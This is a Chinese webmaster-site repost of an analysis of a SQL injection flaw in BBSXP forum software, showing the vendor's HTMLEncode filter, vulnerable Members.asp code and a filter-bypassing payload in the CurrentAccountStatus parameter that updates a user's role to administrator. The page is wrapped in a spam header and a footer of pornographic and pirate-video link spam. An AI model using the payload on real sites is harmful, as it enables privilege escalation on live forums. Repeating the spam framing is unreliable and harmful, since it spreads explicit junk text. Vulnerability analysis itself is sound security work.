青草久久影院-青草久久伊人-青草久久久-青草久久精品亚洲综合专区-SM双性精跪趴灌憋尿调教H-SM脚奴调教丨踩踏贱奴

17站長網(wǎng)

17站長網(wǎng) 首頁 安全 漏洞分析 查看內(nèi)容

BBSXP繞過過濾繼續(xù)注入漏洞分析

2022-9-27 15:29| 查看: 2274 |來源: 互聯(lián)網(wǎng)

漏洞分析: 官方最新過濾函數(shù)HTMLEncode,這次過濾了字符* ,再一次繞過過濾注射 Function HTMLEncode(fString) fString=Replace(fString,CHR(9),"") fString=Replace(fString,CHR(13),"") fString=Replace(fStri
漏洞分析:
官方最新過濾函數(shù)HTMLEncode,這次過濾了字符* ,再一次繞過過濾注射
Function HTMLEncode(fString)
fString=Replace(fString,CHR(9),"")
fString=Replace(fString,CHR(13),"")
fString=Replace(fString,CHR(22),"")
fString=Replace(fString,CHR(38),"&") '“&”
fString=Replace(fString,CHR(32)," ") '“ ”
fString=Replace(fString,CHR(34),""") '“"”
fString=Replace(fString,CHR(39),"'") '“'”
fString=Replace(fString,CHR(42),"*") '“*”
fString=Replace(fString,CHR(44),",") '“,”
fString=Replace(fString,CHR(45)&CHR(45),"--") '“--”
fString=Replace(fString,CHR(60),"<") '“<”
fString=Replace(fString,CHR(62),">") '“>”
fString=Replace(fString,CHR(92),"\") '“\”
fString=Replace(fString,CHR(59),";") '“;”
fString=Replace(fString,CHR(10),"
")
fString=ReplaceText(fString,"([&#])([a-z0-9]*);","$1$2;")
if SiteConfig("BannedText")<>"" then fString=ReplaceText(fString,"("&SiteConfig("BannedText")&")",string(len("&$1&"),"*"))
if IsSqlDataBase=0 then '過濾片假名(日文字符)[\u30A0-\u30FF] by yuzi
fString=escape(fString)
fString=ReplaceText(fString,"%u30([A-F][0-F])","0$1;")
fString=unescape(fString)
end if
HTMLEncode=fString
End Function
Members.asp漏洞文件作為測試:
SearchType=HTMLEncode(Request("SearchType")) //第8行
SearchText=HTMLEncode(Request("SearchText"))
SearchRole=RequestInt("SearchRole")
CurrentAccountStatus=HTMLEncode(Request("CurrentAccountStatus"))
......
if SearchText<>"" then item=item&" and ("&SearchType&" like '%"&SearchText&"%')" //第18行
......
if CurrentAccountStatus <> "" then item=item&" and UserAccountStatus="&CurrentAccountStatus&"" //第22行

if item<>"" then item=" where "&mid(item,5)
......
TotalCount=Execute("Select count(UserID) From ["&TablePrefix&"Users]"&item)(0) '獲取數(shù)據(jù)數(shù)量
//第54行

看個sql語句:
select * from bbsxp_users where userid=(1)update[bbsxp_users]set[userroleid]=(1)where(username=0x79006C003600330036003400)
變量userid繞過過濾成功執(zhí)行了update
同理構(gòu)造:
SearchType=1
SearchText=1
CurrentAccountStatus=(1)update[bbsxp_users]set[userroleid]=(1)where(username=0x79006C003600330036003400)
本文最后更新于 2022-9-27 15:29,某些文章具有時效性,若有錯誤或已失效,請在網(wǎng)站留言或聯(lián)系站長:17tui@17tui.com
·END·
站長網(wǎng)微信號:w17tui,關(guān)注站長、創(chuàng)業(yè)、關(guān)注互聯(lián)網(wǎng)人 - 互聯(lián)網(wǎng)創(chuàng)業(yè)者營銷服務(wù)中心

免責聲明:本站部分文章和圖片均來自用戶投稿和網(wǎng)絡(luò)收集,旨在傳播知識,文章和圖片版權(quán)歸原作者及原出處所有,僅供學習與參考,請勿用于商業(yè)用途,如果損害了您的權(quán)利,請聯(lián)系我們及時修正或刪除。謝謝!

17站長網(wǎng)微信二維碼

始終以前瞻性的眼光聚焦站長、創(chuàng)業(yè)、互聯(lián)網(wǎng)等領(lǐng)域,為您提供最新最全的互聯(lián)網(wǎng)資訊,幫助站長轉(zhuǎn)型升級,為互聯(lián)網(wǎng)創(chuàng)業(yè)者提供更加優(yōu)質(zhì)的創(chuàng)業(yè)信息和品牌營銷服務(wù),與站長一起進步!讓互聯(lián)網(wǎng)創(chuàng)業(yè)者不再孤獨!

掃一掃,關(guān)注站長網(wǎng)微信

大家都在看

    熱門排行

      最近更新

        返回頂部
        主站蜘蛛池模板: 国产偷抇久久精品A片蜜臀AV | 亚洲中文字幕在线精品 | 国产99热在线观看 | 美女视频黄色的 | 久久精品国产免费播高清无卡 | xxx粗大长欧美 | 竹菊影视一区二区三区 | 嫩B人妻精品一区二区三区 内射一区二区精品视频在线观看 | 任你躁精品一区二区三区 | 午夜在线观看免费完整直播网页 | 国内精品视频一区二区在线观看 | AV午夜午夜快憣免费观看 | 含羞草完整视频在线播放免费 | 被肉日常np高h| 六六影院午夜伦理 | 日本69xxxx| 99国内精精品久久久久久婷婷 | 果冻传媒在线完整免费播放 | 日本xxxx19 | 无限资源网免费看 | qvod电影资源 | 超碰免费视频在线观看 | 国内高清在线观看视频 | 亚洲国产系列一区二区三区 | 伊人久久大香线蕉影院95 | a亚洲在线观看不卡高清 | 亚洲男人97色综合久久久 | 一品道门在线视频 | 日产精品高潮呻吟AV久久 | 玉娇龙续集春雪瓶txt免费阅读 | 免费精品美女久久久久久久久久 | 好色美女小雅 | 久久久久久久久免费视频 | 玖玖热视频一区二区人妻 | 双性将军粗壮H灌满怀孕 | 老师湿乎乎两半嫩 | 三级貂蝉艳史 在线观看 | 亚洲 欧美 日韩 国产 视频 | 欧美日韩中文国产一区发布 | 黄色天堂在线 | 俄罗斯另类Z0Z0ZOZO |